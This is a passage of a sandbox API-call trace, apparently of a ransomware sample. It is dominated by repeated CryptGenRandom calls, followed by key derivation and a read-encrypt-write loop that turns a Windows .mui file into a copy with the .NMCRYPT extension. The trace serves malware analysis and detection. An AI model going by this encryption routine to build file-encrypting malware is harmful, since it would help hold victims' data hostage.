pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.454] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.454] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.454] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.455] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0159.455] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.455] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad738) returned 1 [0159.455] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0159.455] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0159.455] wcslen (_String="\\\\?\\") returned 0x4 [0159.455] CryptDuplicateKey (in: hKey=0x9ad738, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad378) returned 1 [0159.455] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0159.456] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\pl-PL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0159.600] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0159.600] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0159.601] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.602] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.603] GetLastError () returned 0x0 [0159.603] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.093] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.093] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.093] GetLastError () returned 0x0 [0160.093] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.093] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.094] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.094] GetLastError () returned 0x0 [0160.094] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.094] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.094] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.094] GetLastError () returned 0x0 [0160.094] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.094] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.094] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.094] GetLastError () returned 0x0 [0160.094] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.094] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.094] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.094] GetLastError () returned 0x0 [0160.094] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.094] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.094] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.094] GetLastError () returned 0x0 [0160.094] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.094] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.094] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.094] GetLastError () returned 0x0 [0160.094] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.094] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.094] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.094] GetLastError () returned 0x0 [0160.095] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.095] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.095] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.095] GetLastError () returned 0x0 [0160.095] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.095] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.095] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.095] GetLastError () returned 0x0 [0160.095] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.095] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.095] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.095] GetLastError () returned 0x0 [0160.095] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.095] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.095] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.095] GetLastError () returned 0x0 [0160.095] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.095] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.095] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.095] GetLastError () returned 0x0 [0160.095] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.095] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.095] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.095] GetLastError () returned 0x0 [0160.095] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.096] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.096] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.096] GetLastError () returned 0x0 [0160.096] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.096] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.096] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.096] GetLastError () returned 0x0 [0160.096] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.096] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.096] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.096] GetLastError () returned 0x0 [0160.096] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.096] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.096] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.096] GetLastError () returned 0x0 [0160.096] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.096] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.096] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.096] GetLastError () returned 0x0 [0160.096] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.096] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.097] CryptEncrypt (in: 